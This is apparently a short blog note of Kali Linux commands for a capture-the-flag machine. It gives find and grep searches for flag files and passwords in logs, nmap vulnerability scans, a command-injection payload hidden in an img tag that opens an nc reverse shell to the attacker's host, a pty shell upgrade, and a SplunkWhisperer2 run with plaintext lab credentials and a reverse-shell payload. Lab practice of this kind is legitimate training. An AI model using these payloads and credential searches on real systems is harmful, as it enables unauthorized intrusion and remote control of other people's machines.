less than 1 minute read

Commands used on Kali Linux 2020

You can use redirect the Standard Error Output from (Generally Display/Screen) to some file and avoid seeing the error messages on the screen! redirect to a special file /dev/null :

find / -name 'user.txt' 2>/dev/null
find / -name 'root.txt' 2>/dev/null
find / -name 'backup' 2>/dev/null

grep -H -r "password" /var/log

# Scan a file or smal directory but not the whole root

grep -Rinw /var/log/apache2/backup -e 'password'

#Always look for backups with passwords in them with find command

##More

Good complete scan if you want to also save to file

nmap -sC -sV -A -o scanresults.txt 10.10.10.209

Scan for vulns with:

nmap -v –script vuln 10.10.10.209 and also nmap -sV –script=all 10.10.10.209

If a web site allows you to send messages from a page open a listener and send this script

 Note open a nc listener first - nc -nlvp 1234
# use this when a web site allows a message to be inserted in a field

<img src=http://10.10.14.21/$(nc.traditional$IFS-e/bin/bash$IFS'10.10.14.21'$IFS'1234')>

Improve a shell once you get it:

python3 -c ‘import pty;pty.spawn(“/bin/bash”)’

https://github.com/cnotin/SplunkWhisperer2/tree/master/PySplunkWhisperer2

root💀kali)-[/home/…/targets/doctor/SplunkWhisperer2/PySplunkWhisperer2]

└─# python3 PySplunkWhisperer2_remote.py --host 10.10.10.209 --lhost 10.10.14.21 --username shaun --password Guitar123 --payload 'nc.traditional -e/bin/sh '10.10.14.21' '6768''